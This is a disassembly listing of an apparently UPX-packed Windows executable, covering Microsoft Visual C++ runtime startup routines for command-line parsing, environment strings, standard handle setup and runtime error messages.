mov eax, esi
pop esi
retn
sub_422E72 endp
; =============== S U B R O U T I N E =======================================
sub_422ECA proc near ; CODE XREF: UPX0:0041D9C1�p
push ebx
xor ebx, ebx
cmp ds:dword_4DCFF4, ebx
push esi
push edi
jnz short loc_422EDC
call sub_42026D
loc_422EDC: ; CODE XREF: sub_422ECA+B�j
mov esi, ds:dword_4DB9C8
xor edi, edi
loc_422EE4: ; CODE XREF: sub_422ECA+30�j
mov al, [esi]
cmp al, bl
jz short loc_422EFC
cmp al, 3Dh
jz short loc_422EEF
inc edi
loc_422EEF: ; CODE XREF: sub_422ECA+22�j
push esi
call sub_41AFE0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_422EE4
; ---------------------------------------------------------------------------
loc_422EFC: ; CODE XREF: sub_422ECA+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_41B4D5
mov esi, eax
pop ecx
cmp esi, ebx
mov ds:dword_4DB980, esi
jnz short loc_422F1E
push 9
call sub_41DA29
pop ecx
loc_422F1E: ; CODE XREF: sub_422ECA+4A�j
mov edi, ds:dword_4DB9C8
cmp [edi], bl
jz short loc_422F61
push ebp
loc_422F29: ; CODE XREF: sub_422ECA+94�j
push edi
call sub_41AFE0
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_422F5A
push ebp
call sub_41B4D5
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_422F4D
push 9
call sub_41DA29
pop ecx
loc_422F4D: ; CODE XREF: sub_422ECA+79�j
push edi
push dword ptr [esi]
call sub_41BEB0
pop ecx
add esi, 4
pop ecx
loc_422F5A: ; CODE XREF: sub_422ECA+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_422F29
pop ebp
loc_422F61: ; CODE XREF: sub_422ECA+5C�j
push ds:dword_4DB9C8
call sub_41B0B1
pop ecx
mov ds:dword_4DB9C8, ebx
mov [esi], ebx
pop edi
pop esi
mov ds:dword_4DCFF0, 1
pop ebx
retn
sub_422ECA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422F83 proc near ; CODE XREF: UPX0:0041D9BC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp ds:dword_4DCFF4, ebx
push esi
push edi
jnz short loc_422F9A
call sub_42026D
loc_422F9A: ; CODE XREF: sub_422F83+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call dword_427070 ; GetModuleFileNameA
mov eax, ds:dword_4DCFEC
mov ds:off_4DB990, esi
mov edi, esi
cmp [eax], bl
jz short loc_422FBF
mov edi, eax
loc_422FBF: ; CODE XREF: sub_422F83+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_42301C
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_41B4D5
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_422FEF
push 8
call sub_41DA29
pop ecx
loc_422FEF: ; CODE XREF: sub_422F83+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_42301C
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov ds:dword_4DB978, esi
pop edi
pop esi
mov ds:dword_4DB974, eax
pop ebx
leave
retn
sub_422F83 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42301C proc near ; CODE XREF: sub_422F83+47�p
; sub_422F83+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_423046
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_423046: ; CODE XREF: sub_42301C+20�j
cmp byte ptr [eax], 22h
jnz short loc_42308F
loc_42304B: ; CODE XREF: sub_42301C+58�j
; sub_42301C+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_42307D
test dl, dl
jz short loc_42307D
movzx edx, dl
test ds:byte_4DCEC1[edx], 4
jz short loc_423070
inc dword ptr [ecx]
test esi, esi
jz short loc_423070
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_423070: ; CODE XREF: sub_42301C+46�j
; sub_42301C+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_42304B
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_42304B
; ---------------------------------------------------------------------------
loc_42307D: ; CODE XREF: sub_42301C+36�j
; sub_42301C+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_423087
and byte ptr [esi], 0
inc esi
loc_423087: ; CODE XREF: sub_42301C+65�j
cmp byte ptr [eax], 22h
jnz short loc_4230D2
inc eax
jmp short loc_4230D2
; ---------------------------------------------------------------------------
loc_42308F: ; CODE XREF: sub_42301C+2D�j
; sub_42301C+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_42309A
mov dl, [eax]
mov [esi], dl
inc esi
loc_42309A: ; CODE XREF: sub_42301C+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test ds:byte_4DCEC1[ebx], 4
jz short loc_4230B5
inc dword ptr [ecx]
test esi, esi
jz short loc_4230B4
mov bl, [eax]
mov [esi], bl
inc esi
loc_4230B4: ; CODE XREF: sub_42301C+91�j
inc eax
loc_4230B5: ; CODE XREF: sub_42301C+8B�j
cmp dl, 20h
jz short loc_4230C3
test dl, dl
jz short loc_4230C7
cmp dl, 9
jnz short loc_42308F
loc_4230C3: ; CODE XREF: sub_42301C+9C�j
test dl, dl
jnz short loc_4230CA
loc_4230C7: ; CODE XREF: sub_42301C+A0�j
dec eax
jmp short loc_4230D2
; ---------------------------------------------------------------------------
loc_4230CA: ; CODE XREF: sub_42301C+A9�j
test esi, esi
jz short loc_4230D2
and byte ptr [esi-1], 0
loc_4230D2: ; CODE XREF: sub_42301C+6E�j
; sub_42301C+71�j ...
and [ebp+arg_10], 0
loc_4230D6: ; CODE XREF: sub_42301C+19E�j
cmp byte ptr [eax], 0
jz loc_4231BF
loc_4230DF: ; CODE XREF: sub_42301C+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_4230EB
cmp dl, 9
jnz short loc_4230EE
loc_4230EB: ; CODE XREF: sub_42301C+C8�j
inc eax
jmp short loc_4230DF
; ---------------------------------------------------------------------------
loc_4230EE: ; CODE XREF: sub_42301C+CD�j
cmp byte ptr [eax], 0
jz loc_4231BF
test edi, edi
jz short loc_423103
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_423103: ; CODE XREF: sub_42301C+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_423108: ; CODE XREF: sub_42301C+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_423111: ; CODE XREF: sub_42301C+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_42311A
inc eax
inc ebx
jmp short loc_423111
; ---------------------------------------------------------------------------
loc_42311A: ; CODE XREF: sub_42301C+F8�j
cmp byte ptr [eax], 22h
jnz short loc_42314B
test bl, 1
jnz short loc_423149
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_423138
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_423138
mov eax, edx
jmp short loc_42313B
; ---------------------------------------------------------------------------
loc_423138: ; CODE XREF: sub_42301C+10D�j
; sub_42301C+116�j
mov [ebp+arg_0], edi
loc_42313B: ; CODE XREF: sub_42301C+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_423149: ; CODE XREF: sub_42301C+106�j
shr ebx, 1
loc_42314B: ; CODE XREF: sub_42301C+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_423160
inc ebx
loc_423153: ; CODE XREF: sub_42301C+142�j
test esi, esi
jz short loc_42315B
mov byte ptr [esi], 5Ch
inc esi
loc_42315B: ; CODE XREF: sub_42301C+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_423153
loc_423160: ; CODE XREF: sub_42301C+134�j
mov dl, [eax]
test dl, dl
jz short loc_4231B0
cmp [ebp+arg_10], 0
jnz short loc_423176
cmp dl, 20h
jz short loc_4231B0
cmp dl, 9
jz short loc_4231B0
loc_423176: ; CODE XREF: sub_42301C+14E�j
cmp [ebp+arg_0], 0
jz short loc_4231AA
test esi, esi
jz short loc_423199
movzx ebx, dl
test ds:byte_4DCEC1[ebx], 4
jz short loc_423192
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_423192: ; CODE XREF: sub_42301C+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_4231A8
; ---------------------------------------------------------------------------
loc_423199: ; CODE XREF: sub_42301C+162�j
movzx edx, dl
test ds:byte_4DCEC1[edx], 4
jz short loc_4231A8
inc eax
inc dword ptr [ecx]
loc_4231A8: ; CODE XREF: sub_42301C+17B�j
; sub_42301C+187�j
inc dword ptr [ecx]
loc_4231AA: ; CODE XREF: sub_42301C+15E�j
inc eax
jmp loc_423108
; ---------------------------------------------------------------------------
loc_4231B0: ; CODE XREF: sub_42301C+148�j
; sub_42301C+153�j ...
test esi, esi
jz short loc_4231B8
and byte ptr [esi], 0
inc esi
loc_4231B8: ; CODE XREF: sub_42301C+196�j
inc dword ptr [ecx]
jmp loc_4230D6
; ---------------------------------------------------------------------------
loc_4231BF: ; CODE XREF: sub_42301C+BD�j
; sub_42301C+D5�j
test edi, edi
jz short loc_4231C6
and dword ptr [edi], 0
loc_4231C6: ; CODE XREF: sub_42301C+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_42301C endp
; =============== S U B R O U T I N E =======================================
sub_4231D0 proc near ; CODE XREF: UPX0:0041D9B2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_4DBB38
push ebx
push ebp
mov ebp, dword_42703C
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_42321E
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_4231FF
mov ds:dword_4DBB38, 1
jmp short loc_423227
; ---------------------------------------------------------------------------
loc_4231FF: ; CODE XREF: sub_4231D0+21�j
call dword_427040 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_4232F9
mov ds:dword_4DBB38, 2
jmp loc_4232AD
; ---------------------------------------------------------------------------
loc_42321E: ; CODE XREF: sub_4231D0+19�j
cmp eax, 1
jnz loc_4232A8
loc_423227: ; CODE XREF: sub_4231D0+2D�j
cmp esi, ebx
jnz short loc_423237
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_4232F9
loc_423237: ; CODE XREF: sub_4231D0+59�j
cmp [esi], bx
mov eax, esi
jz short loc_42324C
loc_42323E: ; CODE XREF: sub_4231D0+73�j
; sub_4231D0+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_42323E
inc eax
inc eax
cmp [eax], bx
jnz short loc_42323E
loc_42324C: ; CODE XREF: sub_4231D0+6C�j
sub eax, esi
mov edi, dword_42717C
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_42329D
push ebp
call sub_41B4D5
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_42329D
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_423299
push [esp+18h+var_8]
call sub_41B0B1
pop ecx
mov [esp+18h+var_8], ebx
loc_423299: ; CODE XREF: sub_4231D0+B9�j
mov ebx, [esp+18h+var_8]
loc_42329D: ; CODE XREF: sub_4231D0+99�j
; sub_4231D0+A8�j
push esi
call dword_427044 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_4232FB
; ---------------------------------------------------------------------------
loc_4232A8: ; CODE XREF: sub_4231D0+51�j
cmp eax, 2
jnz short loc_4232F9
loc_4232AD: ; CODE XREF: sub_4231D0+49�j
cmp edi, ebx
jnz short loc_4232BD
call dword_427040 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_4232F9
loc_4232BD: ; CODE XREF: sub_4231D0+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_4232CD
loc_4232C3: ; CODE XREF: sub_4231D0+F6�j
; sub_4231D0+FB�j
inc eax
cmp [eax], bl
jnz short loc_4232C3
inc eax
cmp [eax], bl
jnz short loc_4232C3
loc_4232CD: ; CODE XREF: sub_4231D0+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_41B4D5
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4232E3
xor esi, esi
jmp short loc_4232EE
; ---------------------------------------------------------------------------
loc_4232E3: ; CODE XREF: sub_4231D0+10D�j
push ebp
push edi
push esi
call sub_41C310
add esp, 0Ch
loc_4232EE: ; CODE XREF: sub_4231D0+111�j
push edi
call dword_427048 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_4232FB
; ---------------------------------------------------------------------------
loc_4232F9: ; CODE XREF: sub_4231D0+39�j
; sub_4231D0+61�j ...
xor eax, eax
loc_4232FB: ; CODE XREF: sub_4231D0+D6�j
; sub_4231D0+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_4231D0 endp
; =============== S U B R O U T I N E =======================================
sub_423302 proc near ; CODE XREF: UPX0:0041D9A2�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_41B4D5
mov esi, eax
pop ecx
test esi, esi
jnz short loc_423322
push 1Bh
call sub_41DA29
pop ecx
loc_423322: ; CODE XREF: sub_423302+16�j
mov ds:dword_4DCCA0, esi
mov ds:dword_4DCDA0, 20h
lea eax, [esi+100h]
loc_423338: ; CODE XREF: sub_423302+52�j
cmp esi, eax
jnb short loc_423356
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, ds:dword_4DCCA0
add esi, 8
add eax, 100h
jmp short loc_423338
; ---------------------------------------------------------------------------
loc_423356: ; CODE XREF: sub_423302+38�j
lea eax, [esp+54h+var_44]
push eax
call dword_4271A8 ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_423432
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_423432
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_42338C
mov esi, eax
loc_42338C: ; CODE XREF: sub_423302+86�j
cmp ds:dword_4DCDA0, esi
jge short loc_4233E6
mov edi, offset dword_4DCCA4
loc_423399: ; CODE XREF: sub_423302+DA�j
push 100h
call sub_41B4D5
test eax, eax
pop ecx
jz short loc_4233E0
add ds:dword_4DCDA0, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_4233B7: ; CODE XREF: sub_423302+CF�j
cmp eax, ecx
jnb short loc_4233D3
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_4233B7
; ---------------------------------------------------------------------------
loc_4233D3: ; CODE XREF: sub_423302+B7�j
add edi, 4
cmp ds:dword_4DCDA0, esi
jl short loc_423399
jmp short loc_4233E6
; ---------------------------------------------------------------------------
loc_4233E0: ; CODE XREF: sub_423302+A4�j
mov esi, ds:dword_4DCDA0
loc_4233E6: ; CODE XREF: sub_423302+90�j
; sub_423302+DC�j
xor edi, edi
test esi, esi
jle short loc_423432
loc_4233EC: ; CODE XREF: sub_423302+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_423429
mov cl, [ebp+0]
test cl, 1
jz short loc_423429
test cl, 8
jnz short loc_42340B
push eax
call dword_427030 ; GetFileType
test eax, eax
jz short loc_423429
loc_42340B: ; CODE XREF: sub_423302+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_4DCCA0[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_423429: ; CODE XREF: sub_423302+EF�j
; sub_423302+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_4233EC
loc_423432: ; CODE XREF: sub_423302+65�j
; sub_423302+71�j ...
xor ebx, ebx
loc_423434: ; CODE XREF: sub_423302+195�j
mov eax, ds:dword_4DCCA0
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_42348F
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_42344F
push 0FFFFFFF6h
pop eax
jmp short loc_423459
; ---------------------------------------------------------------------------
loc_42344F: ; CODE XREF: sub_423302+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_423459: ; CODE XREF: sub_423302+14B�j
push eax
call dword_427034 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_42347E
push edi
call dword_427030 ; GetFileType
test eax, eax
jz short loc_42347E
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_423484
loc_42347E: ; CODE XREF: sub_423302+163�j
; sub_423302+16E�j
or byte ptr [esi+4], 40h
jmp short loc_423493
; ---------------------------------------------------------------------------
loc_423484: ; CODE XREF: sub_423302+17A�j
cmp eax, 3
jnz short loc_423493
or byte ptr [esi+4], 8
jmp short loc_423493
; ---------------------------------------------------------------------------
loc_42348F: ; CODE XREF: sub_423302+13E�j
or byte ptr [esi+4], 80h
loc_423493: ; CODE XREF: sub_423302+180�j
; sub_423302+185�j ...
inc ebx
cmp ebx, 3
jl short loc_423434
push ds:dword_4DCDA0
call dword_427038 ; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_423302 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4234B8 proc near ; DATA XREF: UPX0:0041D93D�o
; sub_42205D+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_423558
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4234EB: ; CODE XREF: sub_4234B8+90�j
cmp esi, 0FFFFFFFFh
jz short loc_423551
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_42353F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_42353F
js short loc_42354A
mov edi, [ebx+8]
push ebx
call sub_41CB74
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41CBB6
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_41CC4A
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_42353F: ; CODE XREF: sub_4234B8+40�j
; sub_4234B8+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4234EB
; ---------------------------------------------------------------------------
loc_42354A: ; CODE XREF: sub_4234B8+54�j
mov eax, 0
jmp short loc_42356D
; ---------------------------------------------------------------------------
loc_423551: ; CODE XREF: sub_4234B8+36�j
mov eax, 1
jmp short loc_42356D
; ---------------------------------------------------------------------------
loc_423558: ; CODE XREF: sub_4234B8+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41CBB6
add esp, 8
pop ebp
mov eax, 1
loc_42356D: ; CODE XREF: sub_4234B8+97�j
; sub_4234B8+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4234B8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_41CBB6
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_423590 proc near ; CODE XREF: sub_41DA29+9�p
; sub_41DA4E+9�p
mov eax, ds:dword_4DB9D0
cmp eax, 1
jz short loc_4235A7
test eax, eax
jnz short locret_4235C8
cmp dword_43A9A4, 1
jnz short locret_4235C8
loc_4235A7: ; CODE XREF: sub_423590+8�j
push 0FCh
call sub_4235C9
mov eax, ds:dword_4DBB3C
pop ecx
test eax, eax
jz short loc_4235BD
call eax
loc_4235BD: ; CODE XREF: sub_423590+29�j
push 0FFh
call sub_4235C9
pop ecx
locret_4235C8: ; CODE XREF: sub_423590+C�j
; sub_423590+15�j
retn
sub_423590 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4235C9 proc near ; CODE XREF: sub_41DA29+12�p
; sub_41DA4E+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_43D038
loc_4235DC: ; CODE XREF: sub_4235C9+20�j
cmp edx, [eax]
jz short loc_4235EB
add eax, 8
inc ecx
cmp eax, offset off_43D0C8
jl short loc_4235DC
loc_4235EB: ; CODE XREF: sub_4235C9+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, dword_43D038[esi]
jnz loc_423719
mov eax, ds:dword_4DB9D0
cmp eax, 1
jz loc_4236F3
test eax, eax
jnz short loc_42361C
cmp dword_43A9A4, 1
jz loc_4236F3
loc_42361C: ; CODE XREF: sub_4235C9+44�j
cmp edx, 0FCh
jz loc_423719
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call dword_427070 ; GetModuleFileNameA
test eax, eax
jnz short loc_423653
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_41BEB0
pop ecx
pop ecx
loc_423653: ; CODE XREF: sub_4235C9+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_41AFE0
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_423696
lea eax, [ebp+var_1A4]
push eax
call sub_41AFE0
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_41B5F0
add esp, 10h
loc_423696: ; CODE XREF: sub_4235C9+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_41BEB0
lea eax, [ebp+var_A0]
push edi
push eax
call sub_41BEC0
lea eax, [ebp+var_A0]
push offset asc_427C08 ; "\n\n"
push eax
call sub_41BEC0
push off_43D03C[esi]
lea eax, [ebp+var_A0]
push eax
call sub_41BEC0
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_424D78
add esp, 2Ch
pop edi
jmp short loc_423719
; ---------------------------------------------------------------------------
loc_4236F3: ; CODE XREF: sub_4235C9+3C�j
; sub_4235C9+4D�j
lea eax, [ebp+arg_0]
lea esi, off_43D03C[esi]
push 0
push eax
push dword ptr [esi]
call sub_41AFE0
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_427034 ; GetStdHandle
push eax
call dword_4270E0 ; WriteFile
loc_423719: ; CODE XREF: sub_4235C9+2E�j
; sub_4235C9+59�j ...
pop esi
leave
retn
sub_4235C9 endp
; =============== S U B R O U T I N E =======================================
sub_42371C proc near ; CODE XREF: sub_423A33:loc_423BAB�p
push ebx
push esi
push edi
or ebx, 0FFFFFFFFh
xor edi, edi
xor esi, esi
mov ecx, offset dword_4DCCA0
loc_42372B: ; CODE XREF: sub_42371C+48�j
mov eax, [ecx]
test eax, eax
jz short loc_423768
lea edx, [eax+100h]
loc_423737: ; CODE XREF: sub_42371C+28�j
cmp eax, edx
jnb short loc_423757
test byte ptr [eax+4], 1
jz short loc_423746
add eax, 8
jmp short loc_423737
; ---------------------------------------------------------------------------
loc_423746: ; CODE XREF: sub_42371C+23�j
or dword ptr [eax], 0FFFFFFFFh
sub eax, [ecx]
sar eax, 3
add eax, esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_4237AB
loc_423757: ; CODE XREF: sub_42371C+1D�j
add ecx, 4
inc edi
add esi, 20h
cmp ecx, offset dword_4DCDA0
jl short loc_42372B
jmp short loc_4237AB
; ---------------------------------------------------------------------------
loc_423768: ; CODE XREF: sub_42371C+13�j
mov esi, 100h
push esi
call sub_41B4D5
test eax, eax
pop ecx
jz short loc_4237AB
add ds:dword_4DCDA0, 20h
lea ecx, ds:4DCCA0h[edi*4]
lea edx, [eax+100h]
mov [ecx], eax
loc_42378E: ; CODE XREF: sub_42371C+88�j
cmp eax, edx
jnb short loc_4237A6
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 8
add edx, esi
jmp short loc_42378E
; ---------------------------------------------------------------------------
loc_4237A6: ; CODE XREF: sub_42371C+74�j
shl edi, 5
mov ebx, edi
loc_4237AB: ; CODE XREF: sub_42371C+39�j
; sub_42371C+4A�j ...
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_42371C endp
; =============== S U B R O U T I N E =======================================
sub_4237B1 proc near ; CODE XREF: sub_423A33+1F4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
cmp eax, ds:dword_4DCDA0
push edi
jnb short loc_423811
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:4DCCA0h[ecx*4]
shl esi, 3
mov ecx, [edi]
cmp dword ptr [ecx+esi], 0FFFFFFFFh
jnz short loc_423811
cmp dword_43A9A4, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_423807
sub eax, 0
jz short loc_4237FE
dec eax
jz short loc_4237F9
dec eax
jnz short loc_423807
push ebx
push 0FFFFFFF4h
jmp short loc_423801
; ---------------------------------------------------------------------------
loc_4237F9: ; CODE XREF: sub_4237B1+3E�j
push ebx
push 0FFFFFFF5h
jmp short loc_423801
; ---------------------------------------------------------------------------
loc_4237FE: ; CODE XREF: sub_4237B1+3B�j
push ebx
push 0FFFFFFF6h
loc_423801: ; CODE XREF: sub_4237B1+46�j
; sub_4237B1+4B�j
call dword_42702C ; SetStdHandle
loc_423807: ; CODE XREF: sub_4237B1+36�j
; sub_4237B1+41�j
mov eax, [edi]
mov [eax+esi], ebx
xor eax, eax
pop ebx
jmp short loc_423825
; ---------------------------------------------------------------------------
loc_423811: ; CODE XREF: sub_4237B1+C�j
; sub_4237B1+28�j
and ds:dword_4DB95C, 0
mov ds:dword_4DB958, 9
or eax, 0FFFFFFFFh
loc_423825: ; CODE XREF: sub_4237B1+5E�j
pop edi
pop esi
retn
sub_4237B1 endp
; =============== S U B R O U T I N E =======================================
sub_423828 proc near ; CODE XREF: sub_41DA72+7C�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
cmp ecx, ds:dword_4DCDA0
push edi
jnb short loc_42388B
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea edi, ds:4DCCA0h[eax*4]
shl esi, 3
mov eax, [edi]
add eax, esi
test byte ptr [eax+4], 1
jz short loc_42388B
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_42388B
cmp dword_43A9A4, 1
jnz short loc_423881
xor eax, eax
sub ecx, eax
jz short loc_423878
dec ecx
jz short loc_423873
dec ecx
jnz short loc_423881
push eax
push 0FFFFFFF4h
jmp short loc_42387B
; ---------------------------------------------------------------------------
loc_423873: ; CODE XREF: sub_423828+41�j
push eax
push 0FFFFFFF5h
jmp short loc_42387B
; ---------------------------------------------------------------------------
loc_423878: ; CODE XREF: sub_423828+3E�j
push eax
push 0FFFFFFF6h
loc_42387B: ; CODE XREF: sub_423828+49�j
; sub_423828+4E�j
call dword_42702C ; SetStdHandle
loc_423881: ; CODE XREF: sub_423828+38�j
; sub_423828+44�j
mov eax, [edi]
or dword ptr [eax+esi], 0FFFFFFFFh
xor eax, eax
jmp short loc_42389F
; ---------------------------------------------------------------------------
loc_42388B: ; CODE XREF: sub_423828+C�j
; sub_423828+2A�j ...
and ds:dword_4DB95C, 0
mov ds:dword_4DB958, 9
or eax, 0FFFFFFFFh
loc_42389F: ; CODE XREF: sub_423828+61�j
pop edi
pop esi
